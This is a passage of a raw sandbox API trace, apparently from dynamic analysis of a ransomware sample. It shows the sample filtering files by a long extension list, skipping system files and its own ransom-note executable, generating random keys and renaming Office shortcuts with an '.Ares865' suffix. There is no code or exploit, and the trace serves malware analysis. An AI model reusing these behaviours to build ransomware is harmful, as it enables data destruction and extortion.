(lpString="sas7bdat") returned 8 [0067.004] lstrcmpiW (lpString1="ects.lnk", lpString2="sas7bdat") returned -1 [0067.004] lstrlenW (lpString="sbf") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0067.004] lstrlenW (lpString="scx") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0067.004] lstrlenW (lpString="sdb") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0067.004] lstrlenW (lpString="sdc") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0067.004] lstrlenW (lpString="sdf") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0067.004] lstrlenW (lpString="sis") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0067.004] lstrlenW (lpString="spq") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0067.004] lstrlenW (lpString="te") returned 2 [0067.004] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0067.004] lstrlenW (lpString="teacher") returned 7 [0067.004] lstrcmpiW (lpString1="cts.lnk", lpString2="teacher") returned -1 [0067.004] lstrlenW (lpString="tmd") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0067.004] lstrlenW (lpString="tps") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0067.004] lstrlenW (lpString="trc") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.004] lstrlenW (lpString="trc") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0067.004] lstrlenW (lpString="trm") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0067.004] lstrlenW (lpString="udb") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0067.004] lstrlenW (lpString="udl") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0067.004] lstrlenW (lpString="usr") returned 3 [0067.004] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0067.005] lstrlenW (lpString="v12") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0067.005] lstrlenW (lpString="vis") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0067.005] lstrlenW (lpString="vpd") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0067.005] lstrlenW (lpString="vvv") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0067.005] lstrlenW (lpString="wdb") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0067.005] lstrlenW (lpString="wmdb") returned 4 [0067.005] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0067.005] lstrlenW (lpString="wrk") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0067.005] lstrlenW (lpString="xdb") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0067.005] lstrlenW (lpString="xld") returned 3 [0067.005] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0067.005] lstrlenW (lpString="xmlff") returned 5 [0067.005] lstrcmpiW (lpString1="s.lnk", lpString2="xmlff") returned -1 [0067.005] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.Ares865") returned 132 [0067.005] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk.ares865"), dwFlags=0x1) returned 1 [0067.007] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\digital certificate for vba projects.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.007] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2977) returned 1 [0067.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.007] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.008] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.008] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.008] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.009] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xeb0, lpName=0x0) returned 0x120 [0067.010] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeb0) returned 0x420000 [0067.011] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0067.012] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.012] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3251f8 [0067.012] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3251f8 | out: hHeap=0x2b0000) returned 1 [0067.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.012] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0067.012] CloseHandle (hObject=0x120) returned 1 [0067.012] CloseHandle (hObject=0x12c) returned 1 [0067.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.013] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb7f760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bb7f760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0067.013] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0067.013] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc1179de0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc1179de0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xb65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Clip Organizer.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="aoldtz.exe") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2=".") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="..") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="windows") returned -1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="bootmgr") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="temp") returned -1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="pagefile.sys") returned -1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="boot") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="ids.txt") returned 1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="ntuser.dat") returned -1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="perflogs") returned -1 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2="MSBuild") returned -1 [0067.013] lstrlenW (lpString="Microsoft Clip Organizer.lnk") returned 28 [0067.013] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk") returned 124 [0067.013] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft Clip Organizer.lnk" | out: lpString1="Microsoft Clip Organizer.lnk") returned="Microsoft Clip Organizer.lnk" [0067.013] lstrlenW (lpString="Microsoft Clip Organizer.lnk") returned 28 [0067.013] lstrlenW (lpString="Ares865") returned 7 [0067.013] lstrcmpiW (lpString1="zer.lnk", lpString2="Ares865") returned 1 [0067.013] lstrlenW (lpString=".dll") returned 4 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2=".dll") returned 1 [0067.013] lstrlenW (lpString=".lnk") returned 4 [0067.013] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2=".lnk") returned 1 [0067.013] lstrlenW (lpString=".ini") returned 4 [0067.014] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2=".ini") returned 1 [0067.014] lstrlenW (lpString=".sys") returned 4 [0067.014] lstrcmpiW (lpString1="Microsoft Clip Organizer.lnk", lpString2=".sys") returned 1 [0067.014] lstrlenW (lpString="Microsoft Clip Organizer.lnk") returned 28 [0067.014] lstrlenW (lpString="bak") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0067.014] lstrlenW (lpString="ba_") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0067.014] lstrlenW (lpString="dbb") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0067.014] lstrlenW (lpString="vmdk") returned 4 [0067.014] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0067.014] lstrlenW (lpString="rar") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0067.014] lstrlenW (lpString="zip") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0067.014] lstrlenW (lpString="tgz") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0067.014] lstrlenW (lpString="vbox") returned 4 [0067.014] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0067.014] lstrlenW (lpString="vdi") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0067.014] lstrlenW (lpString="vhd") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0067.014] lstrlenW (lpString="vhdx") returned 4 [0067.014] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0067.014] lstrlenW (lpString="avhd") returned 4 [0067.014] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0067.014] lstrlenW (lpString="db") returned 2 [0067.014] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0067.014] lstrlenW (lpString="db2") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0067.014] lstrlenW (lpString="db3") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0067.014] lstrlenW (lpString="dbf") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0067.014] lstrlenW (lpString="mdf") returned 3 [0067.014] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0067.015] lstrlenW (lpString="mdb") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0067.015] lstrlenW (lpString="sql") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0067.015] lstrlenW (lpString="sqlite") returned 6 [0067.015] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0067.015] lstrlenW (lpString="sqlite3") returned 7 [0067.015] lstrcmpiW (lpString1="zer.lnk", lpString2="sqlite3") returned 1 [0067.015] lstrlenW (lpString="sqlitedb") returned 8 [0067.015] lstrcmpiW (lpString1="izer.lnk", lpString2="sqlitedb") returned -1 [0067.015] lstrlenW (lpString="xml") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0067.015] lstrlenW (lpString="$er") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0067.015] lstrlenW (lpString="4dd") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0067.015] lstrlenW (lpString="4dl") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0067.015] lstrlenW (lpString="^^^") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0067.015] lstrlenW (lpString="abs") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0067.015] lstrlenW (lpString="abx") returned 3 [0067.015] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0067.015] lstrlenW (lpString="accdb") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0067.015] lstrlenW (lpString="accdc") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0067.015] lstrlenW (lpString="accde") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0067.015] lstrlenW (lpString="accdr") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0067.015] lstrlenW (lpString="accdt") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0067.015] lstrlenW (lpString="accdw") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0067.015] lstrlenW (lpString="accft") returned 5 [0067.015] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0067.016] lstrlenW (lpString="adb") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.016] lstrlenW (lpString="adb") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0067.016] lstrlenW (lpString="ade") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0067.016] lstrlenW (lpString="adf") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0067.016] lstrlenW (lpString="adn") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0067.016] lstrlenW (lpString="adp") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0067.016] lstrlenW (lpString="alf") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0067.016] lstrlenW (lpString="ask") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0067.016] lstrlenW (lpString="btr") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0067.016] lstrlenW (lpString="cat") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0067.016] lstrlenW (lpString="cdb") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0067.016] lstrlenW (lpString="ckp") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0067.016] lstrlenW (lpString="cma") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0067.016] lstrlenW (lpString="cpd") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0067.016] lstrlenW (lpString="dacpac") returned 6 [0067.016] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0067.016] lstrlenW (lpString="dad") returned 3 [0067.016] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0067.016] lstrlenW (lpString="dadiagrams") returned 10 [0067.016] lstrcmpiW (lpString1="anizer.lnk", lpString2="dadiagrams") returned -1 [0067.016] lstrlenW (lpString="daschema") returned 8 [0067.016] lstrcmpiW (lpString1="izer.lnk", lpString2="daschema") returned 1 [0067.016] lstrlenW (lpString="db-journal") returned 10 [0067.016] lstrcmpiW (lpString1="anizer.lnk", lpString2="db-journal") returned -1 [0067.016] lstrlenW (lpString="db-shm") returned 6 [0067.017] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0067.017] lstrlenW (lpString="db-wal") returned 6 [0067.017] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0067.017] lstrlenW (lpString="dbc") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0067.017] lstrlenW (lpString="dbs") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0067.017] lstrlenW (lpString="dbt") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0067.017] lstrlenW (lpString="dbv") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0067.017] lstrlenW (lpString="dbx") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0067.017] lstrlenW (lpString="dcb") returned 3 [0067.017] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0067.017] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.Ares865") returned 120 [0067.017] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk.ares865"), dwFlags=0x1) returned 1 [0067.018] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft clip organizer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.018] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2917) returned 1 [0067.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.019] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0067.020] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.020] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.020] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe70, lpName=0x0) returned 0x120 [0067.021] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe70) returned 0x190000 [0067.023] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.023] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.023] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.023] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.023] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.024] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.024] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.024] CloseHandle (hObject=0x120) returned 1 [0067.024] CloseHandle (hObject=0x12c) returned 1 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.024] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.024] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x780122b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc11c60a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc11c60a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xabf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office 2010 Language Preferences.lnk", cAlternateFileName="MICROS~4.LNK")) returned 1 [0067.024] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="aoldtz.exe") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2=".") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="..") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="windows") returned -1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="bootmgr") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="temp") returned -1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="pagefile.sys") returned -1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="boot") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="ids.txt") returned 1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="ntuser.dat") returned -1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="perflogs") returned -1 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2="MSBuild") returned -1 [0067.025] lstrlenW (lpString="Microsoft Office 2010 Language Preferences.lnk") returned 46 [0067.025] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk") returned 112 [0067.025] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft Office 2010 Language Preferences.lnk" | out: lpString1="Microsoft Office 2010 Language Preferences.lnk") returned="Microsoft Office 2010 Language Preferences.lnk" [0067.025] lstrlenW (lpString="Microsoft Office 2010 Language Preferences.lnk") returned 46 [0067.025] lstrlenW (lpString="Ares865") returned 7 [0067.025] lstrcmpiW (lpString1="ces.lnk", lpString2="Ares865") returned 1 [0067.025] lstrlenW (lpString=".dll") returned 4 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2=".dll") returned 1 [0067.025] lstrlenW (lpString=".lnk") returned 4 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2=".lnk") returned 1 [0067.025] lstrlenW (lpString=".ini") returned 4 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2=".ini") returned 1 [0067.025] lstrlenW (lpString=".sys") returned 4 [0067.025] lstrcmpiW (lpString1="Microsoft Office 2010 Language Preferences.lnk", lpString2=".sys") returned 1 [0067.025] lstrlenW (lpString="Microsoft Office 2010 Language Preferences.lnk") returned 46 [0067.025] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.Ares865") returned 138 [0067.025] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\users\\all users\\start 